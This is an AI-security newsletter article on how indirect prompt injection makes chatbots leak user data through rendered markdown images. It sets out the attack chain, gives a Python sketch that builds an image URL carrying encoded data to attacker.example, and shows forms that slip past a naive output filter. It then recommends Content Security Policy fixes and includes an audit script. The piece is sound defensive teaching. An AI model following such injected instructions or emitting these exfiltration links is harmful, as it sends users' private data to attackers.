AI Sec Weekly

How LLM Chatbots Leak Data Through Their Own Rendered Output

A recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server. Why this works, why CSP is the real fix, and what to check this week.

By Theo Voss · 8 min read

One vulnerability class keeps reappearing in AI-security write-ups under slightly different names, across many different chatbot products: data exfiltration through the model’s own rendered output. It is worth a standalone briefing because the root cause is almost never the model — it is the rendering layer the product team built around the model, and the fix is a web-security control most LLM teams have not applied to the chat surface.

The attack, end to end

The setup requires two ingredients that modern assistants routinely provide: the model can be influenced by untrusted content (via indirect prompt injection — a web page, a document, an email it processes), and the UI renders the model’s markdown, including images.

The chain:

  1. A user asks the assistant to summarize an attacker-controlled document or web page.
  2. Hidden text in that content instructs the model: take the user’s earlier messages (or retrieved private context) and append them, URL-encoded, to an image link pointing at an attacker server.
  3. The model, following the injected instruction, emits a markdown inline image whose URL is https://attacker.example/log?d=<the user's data, url-encoded>.
  4. The chat UI renders the markdown. To display the “image,” the browser issues a GET request to the attacker’s server. The data is now in the attacker’s logs. No click is required; rendering is the trigger.

The user sees, at most, a broken image icon. The exfiltration already happened.
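
To make the mechanics concrete, here is a minimal Python sketch of steps 2 through 4. It is an illustration under assumptions, not a reproduction of any specific incident: the endpoint mirrors the example URL above, the function names are hypothetical, and the sample "private" string is invented.

```python
from urllib.parse import quote, urlsplit, parse_qs

# Hypothetical attacker endpoint, matching the example URL in the chain above.
ATTACKER_ENDPOINT = "https://attacker.example/log"


def build_exfil_markdown(private_text: str) -> str:
    """Return the markdown image an injected instruction asks the model to emit."""
    # safe="" percent-encodes every reserved character, including "/" and "&",
    # so the whole string survives as a single query parameter.
    encoded = quote(private_text, safe="")
    return f"![]({ATTACKER_ENDPOINT}?d={encoded})"


def recover_from_request(url: str) -> str:
    """What the attacker's server can read back from the logged GET request."""
    return parse_qs(urlsplit(url).query)["d"][0]


# Invented sample data standing in for the user's earlier messages.
markdown = build_exfil_markdown("my API key is sk-123 & it expires 5/1")
url = markdown[len("![]("):-1]  # the URL the browser fetches when rendering

print(markdown)
print(recover_from_request(url))
```

The round trip is lossless: whatever the model was induced to place in the query string is exactly what lands in the server log once the image is requested.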

Why this keeps shipping

It recurs because the model and the UI are usually built by people reasoning about different threats. The model team is focused on what the model says. The UI team renders markdown because it makes responses look good. Neither owns the question “what happens when the model is induced to emit an attacker-chosen URL and our renderer dutifully fetches it?” The vulnerability lives in the seam between them, which is exactly the seam nobody is assigned to defend.

Output filtering at the model layer helps but is not sufficient — it is the same losing game as filtering injection on the input side. A determined payload will find an emission the filter does not catch.
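
A short sketch shows why pattern-based output filtering tends to lose. The regex below is a hypothetical filter, not one taken from any product: it recognizes only inline markdown images. Reference-style images, which CommonMark also defines, pass straight through, as does a raw HTML image tag in renderers that allow HTML.

```python
import re

# A plausible but incomplete filter (hypothetical): it only knows the inline
# image form ![alt](https://...).
INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*https?://[^)\s]+[^)]*\)")


def naive_filter_flags(model_output: str) -> bool:
    """Return True if the filter would block this model output."""
    return INLINE_IMAGE.search(model_output) is not None


inline = "![](https://attacker.example/log?d=secret)"
# Same image, written with a CommonMark link reference definition.
reference_style = "![x][r]\n\n[r]: https://attacker.example/log?d=secret"
# Only relevant if the renderer passes raw HTML through.
html_tag = '<img src="https://attacker.example/log?d=secret">'

for sample in (inline, reference_style, html_tag):
    print(naive_filter_flags(sample), repr(sample))
```

Each missed form can be patched with another pattern, but the filter has to enumerate every syntax the renderer accepts, while the payload needs only one that was overlooked.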

The real fix is a browser control, not a model control

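The durable mitigation is to deny the rendering layer the ability to make arbitrary outbound requests on the model’s behalf. In the browser, that means a Content Security Policy (CSP) on the chat surface that restricts which origins images may load from.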
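
As a rough sketch of what that control can look like, the Python below builds a Content-Security-Policy header value whose img-src directive is limited to an allowlist, plus a matching renderer-side URL check. The host name images.chat.example and both function names are assumptions for illustration; a real deployment would need its own allowlist and probably more directives.

```python
from typing import Iterable
from urllib.parse import urlsplit

# Hypothetical first-party image host; replace with wherever the product
# actually serves images from.
ALLOWED_IMAGE_HOSTS = {"images.chat.example"}


def build_csp(allowed_image_hosts: Iterable[str]) -> str:
    """Build a CSP header value that limits image loads to an allowlist."""
    sources = ["'self'"] + [f"https://{host}" for host in sorted(allowed_image_hosts)]
    return f"default-src 'self'; img-src {' '.join(sources)}"


def is_allowed_image_url(url: str, allowed_hosts: Iterable[str]) -> bool:
    """Renderer-side check mirroring the policy: https only, exact host match."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname in set(allowed_hosts)


print("Content-Security-Policy:", build_csp(ALLOWED_IMAGE_HOSTS))
print(is_allowed_image_url("https://attacker.example/log?d=secret", ALLOWED_IMAGE_HOSTS))
print(is_allowed_image_url("https://images.chat.example/a.png", ALLOWED_IMAGE_HOSTS))
```

The header is the enforcement point, because the browser refuses the fetch regardless of what markdown the model produced. The renderer-side check is defense in depth and lets the UI drop a disallowed image instead of showing a broken icon.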

What to check this week
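
One check that follows directly from the argument above is whether the policy served with the chat page lets images load from arbitrary hosts. The Python sketch below is a coarse audit under assumptions: the function names are hypothetical, it takes the header value as a plain string, and it only looks for the obvious wildcards rather than implementing full CSP source matching.

```python
from typing import Optional

# Source expressions that let images load from any host.
WILDCARD_SOURCES = {"*", "https:", "http:"}


def image_source_list(csp: str) -> Optional[list]:
    """Return the sources governing images: img-src, else default-src, else None."""
    directives = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            # Directive names are case-insensitive; a repeated directive is
            # ignored after its first occurrence.
            directives.setdefault(tokens[0].lower(), tokens[1:])
    if "img-src" in directives:
        return directives["img-src"]
    return directives.get("default-src")  # None when neither directive is present


def allows_arbitrary_image_hosts(csp: str) -> bool:
    """True if this policy would let a rendered image reach any host."""
    sources = image_source_list(csp)
    if sources is None:
        return True  # no governing directive: image loads are unrestricted
    return any(source.lower() in WILDCARD_SOURCES for source in sources)


for policy in ("", "default-src 'self'; img-src *", "default-src 'self'"):
    print(repr(policy), allows_arbitrary_image_hosts(policy))
```

An empty or missing policy counts as a failure here, since without img-src or default-src the browser places no restriction on image requests.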

The summary that holds across every product this has hit: the model emitting a bad URL cannot be reliably prevented, but the browser fetching it can. Fix the rendering layer, not just the prompt.

— Theo

Sources

  1. OWASP Top 10 for Large Language Model Applications
  2. Content Security Policy (CSP) — MDN Web Docs
  3. MITRE ATLAS — Adversarial Threat Landscape for AI Systems